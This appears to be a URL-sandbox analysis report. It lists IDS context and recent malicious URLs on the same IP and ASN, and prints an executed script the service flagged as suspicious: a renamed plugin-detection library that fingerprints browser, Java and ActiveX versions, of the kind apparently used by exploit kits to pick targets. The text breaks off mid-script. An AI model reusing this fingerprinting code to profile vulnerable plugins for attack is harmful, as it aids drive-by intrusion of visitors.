Overview
Settings
| UserAgent | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 |
| Referer | |
| Adobe Reader | 8.0 |
| Java | 1.6.0_26 |
Intrusion Detection Systems
| Suricata /w Emerging Threats Pro |
| ||||||||||||||||||||
| Snort /w Sourcefire VRT |
|
Recent reports on same IP/ASN/Domain
Last 5 reports on IP: 74.54.95.210
| Date | Alerts / IDS | URL | IP |
|---|---|---|---|
| 2013-03-23 17:30:42 | 1 / 0 | http://stopexcessivesweatingnow.com/ | |
| 2012-11-16 10:51:59 | 0 / 1 | http://indiansites.in/beta/detail/64/www-tamilmp3world-com-tamilmp3world-com-tamil-so (...) | |
| 2012-11-16 07:44:16 | 0 / 1 | http://indiansites.in/beta/detail/1385/tolly-torrents-powered-by-vbulletin.html | |
| 2012-11-16 07:31:01 | 0 / 1 | http://indiansites.in/beta/detail/421/desivideos-net-index-php-desi-videos.html | |
| 2012-11-16 06:36:14 | 0 / 1 | http://indiansites.in/beta/detail/36/www-srungaram-com-the-e-magazine-for-telugu-peop (...) |
Last 6 reports on ASN: AS21844 ThePlanet.com Internet Services, Inc.
| Date | Alerts / IDS | URL | IP |
|---|---|---|---|
| 2013-04-04 11:48:45 | 1 / 10 | http://eveningwiththeeditors.com/wp-content/plugins/wp-plugin-repo-stats/wps.php?c002 | |
| 2013-04-04 11:48:08 | 0 / 1 | http://www.free-slideshow-maker.net/FreePhotoSlideshowMaker.exe | |
| 2013-04-04 11:44:18 | 0 / 1 | http://www.postsmile.com/files/summer.exe | |
| 2013-04-04 11:42:52 | 1 / 3 | http://freedownloadestan.persianblog.ir/tag/dreamtemplate | |
| 2013-04-04 11:42:11 | 0 / 2 | http://flipq.com/downloads/FlipQSetup-v2-33.exe | |
| 2013-04-04 11:41:09 | 0 / 1 | http://etfhq.com/links/downloads-page.php |
JavaScript
Executed Scripts (26)
#26 JavaScript::Script (size: 30677, repeated: 1) - Alert detect on script (Severity: 1)var stfo = {
version: "0.7.8",
name: "stfo",
handler: function(c, b, a) {
return function() {
c(b, a)
}
},
isDefined: function(b) {
return typeof b != "undefined"
},
isArray: function(b) {
return (/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function(b) {
return typeof b == "function"
},
isString: function(b) {
return typeof b == "string"
},
isNum: function(b) {
return typeof b == "number"
},
isStrNum: function(b) {
return (typeof b == "string" && (/\d/).test(b))
},
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function(b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
},
compareNums: function(h, f, d) {
var e = this,
c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)) {
if (e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length); a++) {
if (g(c[a], 10) > g(b[a], 10)) {
return 1
}
if (g(c[a], 10) < g(b[a], 10)) {
return -1
}
}
}
return 0
},
formatNum: function(b, c) {
var d = this,
a, e;
if (!d.isStrNum(b)) {
return null
}
if (!d.isNum(c)) {
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a++) {
if (/^(0+)(.+)$/.test(e[a])) {
e[a] = RegExp.$2
}
if (a > c || !(/\d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
$$hasMimeType: function(a) {
return function(c) {
if (!a.isIE && c) {
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b++) {
if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)) {
return f
}
}
}
}
return null
}
},
findNavPlugin: function(l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? /\d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for (f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if (!k || !(k.test(m) || k.test(b))) {
return a[f]
}
}
}
return null
},
getMimeEnabledPlugin: function(k, m, c) {
var e = this,
f, b = new RegExp(m, "i"),
h = "",
g = c ? new RegExp(c, "i") : 0,
a, l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d++) {
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)) {
if (!g || !(g.test(l) || g.test(a))) {
return f
}
}
}
}
return 0
},
getPluginFileVersion: function(f, b) {
var h = this,
e, d, g, a, c = -1;
if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if (!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a++) {
if (c > -1 && a > c && d[a] != "0") {
return b
}
if (g[a] != d[a]) {
if (c == -1) {
c = a
}
if (d[a] != "0") {
return b
}
}
}
return e
},
AXO: window.ActiveXObject,
getAXO: function(a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
} catch (d) {}
return f
},
convertFuncs: function(f) {
var a, g, d, b = /^[\$][\$]/,
c = this;
for (a in f) {
if (b.test(a)) {
try {
g = a.slice(2);
if (g.length > 0 && !f[g]) {
f[g] = f[a](f);
delete f[a]
}
} catch (d) {}
}
}
},
initObj: function(e, b, d) {
var a, c;
if (e) {
if (e[b[0]] == 1 || d) {
for (a = 0; a < b.length; a = a + 2) {
e[b[a]] = b[a + 1]
}
}
for (a in e) {
c = e[a];
if (c && c[b[0]] == 1) {
this.initObj(c, b)
}
}
}
},
initScript: function() {
var c = this,
a = navigator,
e = "/",
f, i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins) {
if (c.Plugins[f]) {
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
};
c.OS = 100;
if (b) {
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
for (f = d.length - 2; f >= 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if (c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f++) {
if (c.getAXO(j[f])) {
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
},
init: function(d) {
var c = this,
b, d, a = {
status: -3,
plugin: 0
};
if (!c.isString(d)) {
return a
}
if (d.length == 1) {
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b || !b.getVersion) {
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)) {
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE && !c.ActiveXEnabled && d !== "java") {
a.status = -2;
return a
}
a.status = 1;
return a
},
fPush: function(b, a) {
var c = this;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
a.push(b)
}
},
callArray: function(b) {
var c = this,
a;
if (c.isArray(b)) {
for (a = 0; a < b.length; a++) {
if (b[a] === null) {
return
}
c.call(b[a]);
b[a] = null
}
}
},
call: function(c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if (a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if (b.isFunc(c)) {
c(b)
}
}
},
$$isMinVersion: function(a) {
return function(h, g, d, c) {
var e = a.init(h),
f, b = -1,
j = {};
if (e.status < 0) {
return e.status
}
f = e.plugin;
g = a.formatNum(a.isNum(g) ? g.toString() : (a.isStrNum(g) ? a.getNum(g) : "0"));
if (f.getVersionDone != 1) {
f.getVersion(g, d, c);
if (f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
if (f.installed !== null) {
b = f.installed <= 0.5 ? f.installed : (f.installed == 0.7 ? 1 : (f.version === null ? 0 : (a.compareNums(f.version, g, f) >= 0 ? 1 : -0.1)))
};
return b
}
},
getVersionDelimiter: ",",
$$getVersion: function(a) {
return function(g, d, c) {
var e = a.init(g),
f, b, h = {};
if (e.status < 0) {
return null
};
f = e.plugin;
if (f.getVersionDone != 1) {
f.getVersion(null, d, c);
if (f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
},
cleanup: function() {
var a = this;
if (a.garbage && a.isDefined(window.CollectGarbage)) {
window.CollectGarbage()
}
},
addWinEvent: function(d, c) {
var e = this,
a = window,
b;
if (e.isFunc(c)) {
if (a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if (a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
},
winHandler: function(d, c) {
return function() {
d();
if (typeof c == "function") {
c()
}
}
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function(a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
},
winLoaded: false,
$$onWindowLoaded: function(a) {
return function(b) {
if (a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
},
$$onDetectionDone: function(a) {
return function(h, g, c, b) {
var d = a.init(h),
k, e, j = {};
if (d.status == -3) {
return -1
}
e = d.plugin;
if (!a.isArray(e.funcs)) {
e.funcs = []
}
if (e.getVersionDone != 1) {
k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b)
}
if (e.installed != -0.5 && e.installed != 0.5) {
a.call(g);
return 1
}
if (e.NOTF) {
a.fPush(g, e.funcs);
return 0
}
return 1
}
},
div: null,
divID: "stfo",
divWidth: 50,
pluginSize: 1,
emptyDiv: function() {
var d = this,
b, h, c, a, f, g;
if (d.div && d.div.childNodes) {
for (b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if (c && c.childNodes) {
for (h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch (f) {}
}
}
if (c) {
try {
d.div.removeChild(c)
} catch (f) {}
}
}
}
if (!d.div) {
a = document.getElementById(d.divID);
if (a) {
d.div = a
}
}
if (d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch (f) {}
d.div = null
}
},
DONEfuncs: [],
onDoneEmptyDiv: function() {
var c = this,
a, b;
if (!c.winLoaded) {
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for (a in c) {
b = c[a];
if (b && b.funcs) {
if (b.OTF == 3) {
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a++) {
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
},
getWidth: function(c) {
if (c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if (b.isNum(a)) {
return a
}
}
return -1
},
getTagStatus: function(m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.span,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if (!k || !h || !d || !c.getDOMobj(m)) {
return -2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
}
if (l >= i) {
return -1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if (!m.winLoaded && c.winLoaded) {
return 1
}
if (m.winLoaded && c.isNum(b)) {
if (!c.isNum(m.count)) {
m.count = b
}
if (b - m.count >= 10) {
return 1
}
}
}
} catch (f) {}
return 0
},
getDOMobj: function(g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if (b && a) {
d.div.focus()
}
} catch (f) {}
return b ? c.firstChild : null
},
setStyle: function(b, g) {
var f = b.style,
a, d, c = this;
if (f && g) {
for (a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch (d) {}
}
}
},
insertDivInBody: function(a, i) {
var h, f = this,
b = "pd33993399",
d = null,
j = i ? window.top.document : window.document,
c = "<",
g = (j.getElementsByTagName("body")[0] || j.body);
if (!g) {
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
} catch (h) {}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g) {
if (g.firstChild && f.isDefined(g.insertBefore)) {
g.insertBefore(a, g.firstChild)
} else {
g.appendChild(a)
}
if (d) {
g.removeChild(d)
}
} else {}
},
insertHTML: function(g, b, h, a, l) {
var m, n = document,
k = this,
q, p = n.createElement("span"),
o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)) {
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)) {
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2) {
if (/[^\s]/.test(b[o + 1])) {
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2) {
if (/[^\s]/.test(h[o + 1])) {
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
} else {
q = a
}
if (!k.div) {
j = n.getElementById(k.divID);
if (j) {
k.div = j
} else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if (!j) {
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode) {
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
} catch (m) {};
try {
k.div.appendChild(p)
} catch (m) {};
return {
span: p,
winLoaded: k.winLoaded,
tagName: g,
outerHTML: q
}
}
return {
span: null,
winLoaded: k.winLoaded,
tagName: "",
outerHTML: q
}
},
file: {
$: 1,
any: "fileStorageAny999",
valid: "fileStorageValid999",
save: function(d, f, c) {
var b = this,
e = b.$,
a;
if (d && e.isDefined(c)) {
if (!d[b.any]) {
d[b.any] = []
}
if (!d[b.valid]) {
d[b.valid] = []
}
d[b.any].push(c);
a = b.split(f, c);
if (a) {
d[b.valid].push(a)
}
}
},
getValidLength: function(a) {
return a && a[this.valid] ? a[this.valid].length : 0
},
getAnyLength: function(a) {
return a && a[this.any] ? a[this.any].length : 0
},
getValid: function(c, a) {
var b = this;
return c && c[b.valid] ? b.get(c[b.valid], a) : null
},
getAny: function(c, a) {
var b = this;
return c && c[b.any] ? b.get(c[b.any], a) : null
},
get: function(d, a) {
var c = d.length - 1,
b = this.$.isNum(a) ? a : c;
return (b < 0 || b > c) ? null : d[b]
},
split: function(g, c) {
var b = this,
e = b.$,
f = null,
a, d;
g = g ? g.replace(".", "\.") : "";
d = new RegExp("^(.*[^\/])(" + g + "\s*)$");
if (e.isString(c) && d.test(c)) {
a = (RegExp.$1).split("/");
f = {
name: a[a.length - 1],
ext: RegExp.$2,
full: c
};
a[a.length - 1] = "";
f.path = a.join("/")
}
return f
},
z: 0
},
Plugins: {
java: {
mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
navigator: {
a: window.navigator.javaEnabled(),
javaEnabled: function() {
return this.a
},
mimeObj: 0,
pluginObj: 0
},
OTF: null,
minIEver: 7,
debug: 0,
debugEnable: function() {
var a = this,
b = a.$;
a.debug = 1
},
isDisabled: {
$: 1,
DTK: function() {
var a = this,
c = a.$,
b = a.$$;
if ((c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c.isSafari && c.OS == 1 && (!c.verSafari || c.compareNums(c.verSafari, "5,1,0,0") < 0)) || c.isChrome || (c.isIE && !c.ActiveXEnabled)) {
return 1
}
return 0
},
AXO: function() {
var a = this,
c = a.$,
b = a.$$;
return (!c.isIE || !c.ActiveXEnabled || (!b.debug && b.DTK.query().status !== 0))
},
navMime: function() {
var b = this,
d = b.$,
c = b.$$,
a = c.navigator;
if (d.isIE || !a.mimeObj || !a.pluginObj) {
return 1
}
return 0
},
navPlugin: function() {
var b = this,
d = b.$,
c = b.$$,
a = c.navigator;
if (d.isIE || !a.mimeObj || !a.pluginObj) {
return 1
}
return 0
},
windowDotJava: function() {
var a = this,
c = a.$,
b = a.$$;
if (!window.java) {
return 1
}
if (c.OS == 2 && c.verOpera && c.verOpera < 9.2 && c.verOpera >= 9) {
return 1
}
if (c.verGecko && c.compareNums(c.verGecko, "1,9,0,0") < 0 && c.compareNums(c.verGecko, "1,8,0,0") >= 0) {
return 1
}
return 0
},
allApplets: function() {
var b = this,
d = b.$,
c = b.$$,
a = c.navigator;
if (d.OS >= 20) {
return 0
}
if (d.verOpera && d.verOpera < 11 && !a.javaEnabled() && !c.lang.System.getProperty()[0]) {
return 1
}
if ((d.verGecko && d.compareNums(d.verGecko, d.formatNum("2")) < 0) && !a.mimeObj && !c.lang.System.getProperty()[0]) {
return 1
}
return 0
},
AppletTag: function() {
var b = this,
d = b.$,
c = b.$$,
a = c.navigator;
return d.isIE ? !a.javaEnabled() : 0
},
ObjectTag: function() {
var a = this,
c = a.$,
b = a.$$;
return c.isIE ? !c.ActiveXEnabled : 0
},
z: 0
},
getVerifyTagsDefault: function() {
var a = this,
c = a.$,
b = [1, 0, 1];
if (c.OS >= 20) {
return b
}
if ((c.isIE && (c.verIE < 9 || !c.ActiveXEnabled)) || (c.verGecko && c.compareNums(c.verGecko, c.formatNum("2")) < 0) || (c.isSafari && (!c.verSafari || c.compareNums(c.verSafari, c.formatNum("4")) < 0)) || (c.verOpera && c.verOpera < 10)) {
b = [1, 1, 1]
}
return b
},
getVersion: function(j, g, i) {
var b = this,
d = b.$,
e, a = b.applet,
h = b.verify,
k = b.navigator,
f = null,
l = null,
c = null;
if (b.getVersionDone === null) {
b.OTF = 0;
k.mimeObj = d.hasMimeType(b.mimeType);
if (k.mimeObj) {
k.pluginObj = k.mimeObj.enabledPlugin
}
if (h) {
h.begin()
}
}
a.setVerifyTagsArray(i);
d.file.save(b, ".jar", g);
if (b.getVersionDone === 0) {
if (a.should_Insert_Query_Any()) {
e = a.insert_Query_Any();
b.setPluginStatus(e[0], e[1], f)
}
return
}
if ((!f || b.debug) && b.DTK.query().version) {
f = b.DTK.version
}
if ((!f || b.debug) && b.navMime.query().version) {
f = b.navMime.version
}
if ((!f || b.debug) && b.navPlugin.query().version) {
f = b.navPlugin.version
}
if ((!f || b.debug) && b.AXO.query().version) {
f = b.AXO.version
}
if (b.nonAppletDetectionOk(f)) {
c = f
}
if (!c || b.debug || a.VerifyTagsHas(2.2) || a.VerifyTagsHas(2.5)) {
e = b.lang.System.getProperty();
if (e[0]) {
f = e[0];
c = e[0];
l = e[1]
}
}
b.setPluginStatus(c, l, f);
if (a.should_Insert_Query_Any()) {
e = a.insert_Query_Any();
if (e[0]) {
c = e[0];
l = e[1]
}
}
b.setPluginStatus(c, l, f)
},
nonAppletDetectionOk: function(b) {
var d = this,
e = d.$,
a = d.navigator,
c = 1;
if (!b || (!a.javaEnabled() && !d.lang.System.getPropertyHas(b)) || (!e.isIE && !a.mimeObj && !d.lang.System.getPropertyHas(b)) || (e.isIE && !e.ActiveXEnabled)) {
c = 0
} else {
if (e.OS >= 20) {} else {
if (d.info && d.info.getPlugin2Status() < 0 && d.info.BrowserRequiresPlugin2()) {
c = 0
}
}
}
return c
},
setPluginStatus: function(d, f, a) {
var c = this,
e = c.$,
b;
a = a || c.version0;
if (c.OTF > 0) {
d = d || c.lang.System.getProperty()[0]
}
if (c.OTF < 3) {
b = d ? 1 : (a ? -0.2 : -1);
if (c.installed === null || b > c.installed) {
c.installed = b
}
}
if (c.OTF == 2 && c.NOTF && !c.applet.getResult()[0] && !c.lang.System.getProperty()[0]) {
c.installed = a ? -0.2 : -1
};
if (c.OTF == 3 && c.installed != -0.5 && c.installed != 0.5) {
c.installed = (c.NOTF.isJavaActive(1) == 1 || c.lang.System.getProperty()[0]) ? 0.5 : -0.5
}
if (c.OTF == 4 && (c.installed == -0.5 || c.installed == 0.5)) {
if (d) {
c.installed = 1
} else {
if (c.NOTF.isJavaActive(1) == 1) {
if (a) {
c.installed = 1;
d = a
} else {
c.installed = 0
}
} else {
if (a) {
c.installed = -0.2
} else {
c.installed = -1
}
}
}
};
if (a) {
c.version0 = e.formatNum(e.getNum(a))
}
if (d) {
c.version = e.formatNum(e.getNum(d))
}
if (f && e.isString(f)) {
c.vendor = f
}
if (!c.vendor) {
c.vendor = ""
}
if (c.verify && c.verify.isEnabled()) {
c.getVersionDone = 0
} else {
if (c.getVersionDone != 1) {
if (c.OTF < 2) {
c.getVersionDone = 0
} else {
c.getVersionDone = c.applet.can_Insert_Query_Any() ? 0 : 1
}
}
}
},
DTK: {
$: 1,
hasRun: 0,
status: null,
VERSIONS: [],
version: "",
HTML: null,
Plugin2Status: null,
classID: ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
mimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
disabled: function() {
return this.$$.isDisabled.DTK()
},
query: function() {
var k = this,
g = k.$,
d = k.$$,
j, l, h, m = {},
f = {},
a, c = null,
i = null,
b = (k.hasRun || k.disabled());
k.hasRun = 1;
if (b) {
return k
}
k.status = 0;
if (g.isIE && g.verIE >= 6) {
for (l = 0; l < k.classID.length; l++) {
k.HTML = g.insertHTML("object", ["classid", k.classID[l]], []);
c = g.getDOMobj(k.HTML);
try {
if (c && c.jvms) {
break
}
} catch (j) {}
}
} else {
if (!g.isIE && (h = g.hasMimeType(k.mimeType)) && h.type) {
k.HTML = g.insertHTML("object", ["type", h.type], []);
c = g.getDOMobj(k.HTML)
}
}
if (c) {
try {
a = c.jvms;
if (a) {
i = a.getLength();
if (g.isNum(i)) {
k.status = i > 0 ? 1 : -1;
for (l = 0; l < i; l++) {
h = g.getNum(a.get(i - 1 - l).version);
if (h) {
k.VERSIONS.push(h);
f["a" + g.formatNum(h)] = 1
}
}
}
}
} catch (j) {}
}
h = 0;
for (l in f) {
h++
}
if (h && h !== k.VERSIONS.length) {
k.VERSIONS = []
}
if (k.VERSIONS.length) {
k.version = g.formatNum(k.VERSIONS[0])
};
return k
}
},
AXO: {
$: 1,
hasRun: 0,
VERSIONS: [],
version: "",
disabled: function() {
return this.$$.isDisabled.AXO()
},
JavaVersions: [
[1, 9, 1, 40],
[1, 8, 1, 40],
[1, 7, 1, 40],
[1, 6, 0, 40],
[1, 5, 0, 30],
[1, 4, 2, 30],
[1, 3, 1, 30]
],
query: function() {
var a = this,
e = a.$,
b = a.$$,
c = (a.hasRun || a.disabled());
a.hasRun = 1;
if (c) {
return a
}
var i = [],
k = [1, 5, 0, 14],
j = [1, 6, 0, 2],
h = [1, 3, 1, 0],
g = [1, 4, 2, 0],
f = [1, 5, 0, 7],
d = b.getInfo ? true : false,
l = {};
if (e.verIE >= b.minIEver) {
i = a.search(j, j, d);
if (i.length > 0 && d) {
i = a.search(k, k, d)
}
} else {
if (d) {
i = a.search(f, f, true)
}
if (i.length == 0) {
i = a.search(h, g, false)
}
}
if (i.length) {
a.version = i[0];
a.VERSIONS = [].concat(i)
};
return a
},
search: function(a, j, p) {
var h, d, f = this,
e = f.$,
k = f.$$,
n, c, l, q, b, o, r, i = [];
if (e.compareNums(a.join(","), j.join(",")) > 0) {
j = a
}
j = e.formatNum(j.join(","));
var m, s = "1,4,2,0",
g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
for (h = 0; h < f.JavaVersions.length; h++) {
d = f.JavaVersions[h];
n = "JavaPlugin." + d[0] + "" + d[1];
b = d[0] + "." + d[1] + ".";
for (l = d[2]; l >= 0; l--) {
r = "JavaWebStart.isInstalled." + b + l + ".0";
if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 && !e.getAXO(r)) {
continue
}
m = e.compareNums(d[0] + "," + d[1] + "," + l + ",0", s) < 0 ? true : false;
for (q = d[3]; q >= 0; q--) {
c = l + "_" + (q < 10 ? "0" + q : q);
o = n + c;
if (e.getAXO(o) && (m || e.getAXO(r))) {
i.push(b + c);
if (!p) {
return i
}
}
if (o == g) {
return i
}
}
if (e.getAXO(n + l) && (m || e.getAXO(r))) {
i.push(b + l);
if (!p) {
return i
}
}
if (n + l == g) {
return i
}
}
}
return i
}
},
navMime: {
$: 1,
hasRun: 0,
mimetype: "",
version: "",
length: 0,
mimeObj: 0,
pluginObj: 0,
disabled: function() {
return this.$$.isDisabled.navMime()
},
query: function() {
var i = this,
f = i.$,
a = i.$$,
b = (i.hasRun || i.disabled());
i.hasRun = 1;
if (b) {
return i
};
var n = /^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,
g, l, j, d = "",
h = "a",
o, m, k = {},
c = f.formatNum("0");
for (l = 0; l < navigator.mimeTypes.length; l++) {
o = navigator.mimeTypes[l];
m = o ? o.enabledPlugin : 0;
g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0;
if (g && m && (m.description || m.name)) {
if (!k[h + g]) {
i.length++
}
k[h + g] = o.type;
if (f.compareNums(g, c) > 0) {
c = g
}
}
}
g = k[h + c];
if (g) {
o = f.hasMimeType(g);
i.mimeObj = o;
i.pluginObj = o ? o.enabledPlugin : 0;
i.mimetype = g;
i.version = c
};
return i
}
},
navPlugin: {
$: 1,
hasRun: 0,
version: "",
disabled: function() {
return this.$$.isDisabled.navPlugin()
},
query: function() {
var m = this,
e = m.$,
c = m.$$,
h = c.navigator,
j, l, k, g, d, a, i, f = 0,
b = (m.hasRun || m.disabled());
m.hasRun = 1;
if (b) {
return m
};
a = h.pluginObj.name || "";
i = h.pluginObj.description || "";
if (!f || c.debug) {
g = /Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;
if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5) {
f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.$3 ? RegExp.$3 : "0")
}
}
if (!f || c.debug) {
g = /Java[^\d]*Plug-in/i;
l = g.test(i) ? e.formatNum(e.getNum(i)) : 0;
k = g.test(a) ? e.formatNum(e.getNum(a)) : 0;
if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e.formatNum("2")) >= 0)) {
l = 0
}
if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e.formatNum("2")) >= 0)) {
k = 0
}
d = l && k ? (e.compareNums(l, k) > 0 ? l : k) : (l || k);
